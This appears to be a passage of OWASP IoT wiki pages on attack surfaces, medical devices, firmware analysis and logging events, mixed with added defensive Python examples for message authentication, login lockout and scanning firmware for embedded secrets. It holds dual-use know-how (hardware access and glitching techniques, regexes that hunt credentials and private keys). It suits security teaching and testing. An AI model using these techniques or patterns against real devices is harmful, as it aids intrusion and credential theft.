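from typing import Dict, List, Tuple

# Constructed demo key. A real deployment provisions a per-device key at
# enrollment; one key baked into every firmware image is itself a finding.
DEMO_KEY = b"constructed-demo-key-not-for-production"


def _mac(key: bytes, device_id: str, counter: int, payload: bytes) -> bytes:
    """HMAC over device id, counter and payload, each length-prefixed so the
    fields cannot be re-split or swapped without invalidating the tag."""
    did = device_id.encode()
    msg = (struct.pack(">I", len(did)) + did
           + struct.pack(">Q", counter)
           + struct.pack(">I", len(payload)) + payload)
    return hmac.new(key, msg, hashlib.sha256).digest()


def seal(key: bytes, device_id: str, counter: int, payload: bytes) -> dict:
    """Sender side: attach the counter and MAC to an outgoing message."""
    return {
        "device_id": device_id,
        "counter": counter,
        "payload": payload.hex(),
        "mac": _mac(key, device_id, counter, payload).hex(),
    }


@dataclass
class Receiver:
    key: bytes
    # Highest counter accepted per device; a real receiver persists this
    # across restarts, otherwise old captures become valid again.
    last_counter: Dict[str, int] = field(default_factory=dict)

    def verify(self, msg: dict) -> Tuple[bool, str]:
        try:
            device_id = str(msg["device_id"])
            counter = int(msg["counter"])
            payload = bytes.fromhex(msg["payload"])
            mac = bytes.fromhex(msg["mac"])
        except (KeyError, ValueError, TypeError):
            return False, "malformed"
        expected = _mac(self.key, device_id, counter, payload)
        # compare_digest: constant-time, so timing does not leak tag bytes.
        if not hmac.compare_digest(mac, expected):
            return False, "bad-mac"
        # Counter is checked only after the MAC passed: an unauthenticated
        # message must not be able to advance the replay window.
        if counter <= self.last_counter.get(device_id, -1):
            return False, "replay"
        self.last_counter[device_id] = counter
        return True, "ok"


def demo() -> List[str]:
    """Walk through the cases a tester would try; returns the verdicts."""
    rx = Receiver(DEMO_KEY)
    good = seal(DEMO_KEY, "sensor-01", 1, b'{"cmd":"set_temp","value":21}')
    tampered = dict(good)
    tampered["payload"] = b'{"cmd":"set_temp","value":99}'.hex()
    forged = seal(b"attacker-guessed-key", "sensor-01", 2, b'{"cmd":"unlock"}')
    verdicts = [
        rx.verify(good)[1],       # fresh, authentic
        rx.verify(good)[1],       # identical copy resent
        rx.verify(tampered)[1],   # payload edited in transit
        rx.verify(forged)[1],     # wrong key
        rx.verify(seal(DEMO_KEY, "sensor-01", 2, b'{"cmd":"ping"}'))[1],
    ]
    return verdicts


if __name__ == "__main__":
    print(demo())
```

The counter gives replay protection only if the receiver's `last_counter` state survives reboots and is kept per device; a window-based scheme (accept counters within N of the last seen) is the usual refinement when messages can arrive out of order. HMAC is appropriate here because device and backend share a key; for firmware updates, where the device should hold only a public key, an asymmetric signature is the right tool instead.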
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
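The first three rows of the table above (Username Enumeration, Weak Passwords, Account Lockout) are usually fixed together in the authentication code path. The block below is an added example, not code from the OWASP IoT Project or any product, of what the device-side check can look like: a password policy that refuses known defaults such as '1234' and '123456' at registration, PBKDF2 hashing with a per-user salt, one indistinguishable "denied" response for unknown users, wrong passwords and locked accounts (so the interface cannot be used to harvest valid usernames), and a temporary lockout after a fixed number of consecutive failures. The denylist, thresholds, usernames and passwords are constructed for the demo; the `now` parameter exists so the lockout window can be tested without sleeping.

```python
import hashlib
import hmac
import os
import time
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed denylist; a product would also consult vendor defaults and
# known breached-password lists, and never ship a pre-programmed password.
WEAK_PASSWORDS = {"1234", "123456", "password", "admin", "default", "root"}
MIN_LENGTH = 12
MAX_FAILURES = 5         # consecutive failures before the account locks
LOCKOUT_SECONDS = 300    # further attempts are refused for this long
PBKDF2_ROUNDS = 100_000
SALT_LEN = 16


def password_acceptable(pw: str) -> bool:
    """Policy gate applied when a password is set or changed."""
    return len(pw) >= MIN_LENGTH and pw.lower() not in WEAK_PASSWORDS


def hash_password(pw: str, salt: Optional[bytes] = None) -> bytes:
    """PBKDF2-HMAC-SHA256 with a random per-user salt; returns salt || hash."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return salt + dk


def check_password(pw: str, stored: bytes) -> bool:
    salt, dk = stored[:SALT_LEN], stored[SALT_LEN:]
    cand = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(cand, dk)   # constant-time comparison


@dataclass
class AuthGate:
    users: Dict[str, bytes] = field(default_factory=dict)
    failures: Dict[str, int] = field(default_factory=dict)
    locked_until: Dict[str, float] = field(default_factory=dict)
    # Decoy hash verified for unknown users so that a login attempt costs
    # the same time whether or not the username exists.
    _decoy: bytes = field(default_factory=lambda: hash_password("decoy-value-never-matches"))

    def register(self, user: str, pw: str) -> bool:
        if not password_acceptable(pw):
            return False
        self.users[user] = hash_password(pw)
        return True

    def login(self, user: str, pw: str, now: Optional[float] = None) -> str:
        """Returns exactly 'ok' or 'denied'; the reason is never exposed."""
        now = time.time() if now is None else now
        if self.locked_until.get(user, 0.0) > now:
            return "denied"
        stored = self.users.get(user, self._decoy)
        ok = check_password(pw, stored) and user in self.users
        if ok:
            self.failures.pop(user, None)
            return "ok"
        n = self.failures.get(user, 0) + 1
        self.failures[user] = n
        if n >= MAX_FAILURES:
            # Lock even non-existent usernames: a lockout that only ever
            # triggers for real accounts is itself an enumeration oracle.
            self.locked_until[user] = now + LOCKOUT_SECONDS
            self.failures.pop(user, None)
        return "denied"


if __name__ == "__main__":
    gate = AuthGate()
    print(gate.register("admin", "admin"))                      # False
    print(gate.register("alice", "correct horse battery"))      # True
    print(gate.login("alice", "correct horse battery"))         # ok
```

The single "denied" string is the enumeration defence; the decoy hash closes the timing side of the same leak. Lockout by username alone lets anyone who knows a username keep it locked, so in practice it is paired with per-source rate limiting or a backoff that grows with each failure rather than a hard block, and the device logs every lockout event for the monitoring side described under "Administrative Interface" above.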
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
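The vulnerability list and the "File system analysis" step above come down to searching an extracted root filesystem for secrets and comparing what several images contain. The following Python script is an added example written for this page, not Firmwalker or any other tool listed: it walks extracted filesystems, flags set password hashes in /etc/shadow, PEM private keys and credential-looking lines in configuration files, and fingerprints every PEM block so that a certificate or key shared across two images (the "same certificate used on multiple devices" finding) shows up. The two root filesystems and their contents are constructed inline; the hash, certificate and key bytes are placeholders, not real material. Certificate expiry and self-signing are not checked here because that needs an X.509 parser; run `openssl x509 -noout -dates -issuer -subject` on the flagged files for that.<br />

```python
import base64
import hashlib
import re
import tempfile
from pathlib import Path

MAX_FILE = 4 * 1024 * 1024  # only inspect the first 4 MiB of very large files

PRIV_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
# Heuristic grep for credentials in config files; expect some false positives.
CRED_RE = re.compile(rb"(?im)^\s*(?:password|passwd|secret|api_key|token)\s*[=:]\s*[\"']?([^\s\"']+)")
NO_HASH = {b"", b"*", b"!", b"!!", b"x", b"*LK*"}  # shadow/passwd values meaning "no usable hash"


def iter_files(root):
    """Yield (path, leading bytes) for every regular file below root, skipping symlinks."""
    for p in Path(root).rglob("*"):
        if p.is_symlink() or not p.is_file():
            continue
        try:
            yield p, p.read_bytes()[:MAX_FILE]
        except OSError:
            continue


def scan_rootfs(root):
    """Return (relative_path, finding, detail) tuples for one extracted root filesystem."""
    findings = []
    for p, data in iter_files(root):
        rel = p.relative_to(root).as_posix()
        if p.parent.name == "etc" and p.name in ("shadow", "passwd"):
            for line in data.splitlines():
                parts = line.split(b":")
                if len(parts) > 1 and parts[1] not in NO_HASH:
                    findings.append((rel, "password hash", parts[0].decode("ascii", "replace")))
        if PRIV_KEY_RE.search(data):
            findings.append((rel, "private key", ""))
        for m in CRED_RE.finditer(data):
            findings.append((rel, "credential in config", m.group(1).decode("ascii", "replace")))
    return findings


def pem_fingerprints(root):
    """Map SHA-256 of each PEM block's DER body -> PEM label. For certificates this is the
    same digest that `openssl x509 -fingerprint -sha256` prints."""
    fps = {}
    for _p, data in iter_files(root):
        for m in PEM_RE.finditer(data):
            der = base64.b64decode(m.group(2))  # embedded newlines are discarded by default
            fps[hashlib.sha256(der).hexdigest()] = m.group(1).decode("ascii")
    return fps


def shared_pem_material(images):
    """Map fingerprint -> (label, [image names]) for PEM blocks present in more than one image."""
    seen = {}
    for name, root in images.items():
        for fp, label in pem_fingerprints(root).items():
            seen.setdefault(fp, (label, []))[1].append(name)
    return {fp: (label, sorted(names)) for fp, (label, names) in seen.items() if len(names) > 1}


def pem(label, raw):
    """Wrap raw bytes in PEM armour (used only to construct the sample filesystems)."""
    return b"-----BEGIN %s-----\n%s-----END %s-----\n" % (label.encode(), base64.encodebytes(raw), label.encode())


def build_sample_images(base):
    """Two constructed root filesystems that share one certificate but carry distinct keys."""
    shared_cert = pem("CERTIFICATE", b"constructed bytes standing in for a DER certificate")
    images = {}
    for name, serial in (("cam-fw-1.0", b"1001"), ("cam-fw-1.1", b"1002")):
        root = Path(base) / name
        (root / "etc" / "ssl").mkdir(parents=True)
        (root / "etc" / "shadow").write_bytes(
            b"root:$1$Zx9m$QpL3vB6wUa8rT2eYk1nD0/:18000:0:99999:7:::\n"  # constructed, not a real hash
            b"nobody:*:18000:0:99999:7:::\n")
        (root / "etc" / "ssl" / "server.crt").write_bytes(shared_cert)
        (root / "etc" / "ssl" / "server.key").write_bytes(pem("RSA PRIVATE KEY", b"constructed key bytes " + serial))
        (root / "etc" / "cloud.conf").write_bytes(b"endpoint=https://api.example.invalid\npassword = Adm1n!\n")
        images[name] = root
    return images


def run_demo():
    """Build the sample images in a temporary directory and return (findings per image, shared PEM blocks)."""
    images = build_sample_images(tempfile.mkdtemp())
    return {n: scan_rootfs(r) for n, r in images.items()}, shared_pem_material(images)


if __name__ == "__main__":
    per_image, shared = run_demo()
    for name, findings in per_image.items():
        for f in findings:
            print(name, *f)
    for fp, (label, names) in shared.items():
        print("SHARED", label, fp[:16], names)
```

To use it on real dumps, call `scan_rootfs` on each extracted root and `shared_pem_material` on a dict of image name to root path; any `SHARED` line for a key or certificate across product images is a finding on its own, regardless of whether the key is otherwise protected.<br />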
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
